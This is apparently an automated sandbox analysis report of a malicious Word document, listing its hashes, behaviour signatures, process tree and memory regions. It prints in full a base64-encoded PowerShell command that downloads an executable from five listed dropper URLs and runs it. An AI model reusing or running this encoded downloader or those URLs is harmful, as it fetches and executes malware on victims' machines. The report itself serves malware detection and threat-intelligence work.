Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    16/05/2024, 20:02

General

  • Target

    4cceb7f9a7b93b21b2c301b4be788028_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    4cceb7f9a7b93b21b2c301b4be788028

  • SHA1

    7fc688b26b743169e5a42c5f409c56af70ca15d1

  • SHA256

    a8ca88ae6ae53b08174b28a692e3b305eceda27b0dc22286229786b98baed68b

  • SHA512

    52c812c553eef051532acc947cb50e640354ea59761c60348818ea66395c6d723848884b3308b7ac67b829fb4b137939c9af3f5f09c453b242be2dc6493b20c3

  • SSDEEP

    6144:Ww0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+B2KEwCzRm:l0E3dxtR/iU9mvUPBawCzRm

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ta-behesht.ir/images/Provx00a/

exe.dropper

http://tatcogroup.ir/wp-admin/UC/

exe.dropper

http://tcpartner.ru/wp-includes/nr8/

exe.dropper

http://tepcian.utcc.ac.th/wp-admin/SquR/

exe.dropper

http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4cceb7f9a7b93b21b2c301b4be788028_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2472

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            1eec4c35b4b55c8341b3d3712001caaf

            SHA1

            845ef48de51f30d8b7f2acdb3e89f02bf3f5f353

            SHA256

            d2b5662c4ccd3e3a1e59ccd751b401d1dd3ea45de984eb863b96611dab59143a

            SHA512

            849bd6a6b8c279626a20e5fdeaafc548e8ce5c6d3403abdf574744aff17a217abe210e523bd0327e7e46cbc0169497862dcbd47282649bab6611cab889fb13e0

          • memory/2208-34-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-45-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-7-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2208-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2208-9-0x00000000064C0000-0x00000000065C0000-memory.dmp

            Filesize

            1024KB

          • memory/2208-10-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2208-28-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-27-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-26-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-82-0x0000000070E7D000-0x0000000070E88000-memory.dmp

            Filesize

            44KB

          • memory/2208-2-0x0000000070E7D000-0x0000000070E88000-memory.dmp

            Filesize

            44KB

          • memory/2208-46-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-0-0x000000002FF21000-0x000000002FF22000-memory.dmp

            Filesize

            4KB

          • memory/2208-81-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2208-61-0x0000000070E7D000-0x0000000070E88000-memory.dmp

            Filesize

            44KB

          • memory/2208-62-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2208-63-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-64-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-65-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/2208-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2472-53-0x0000000002820000-0x0000000002828000-memory.dmp

            Filesize

            32KB

          • memory/2472-52-0x000000001B660000-0x000000001B942000-memory.dmp

            Filesize

            2.9MB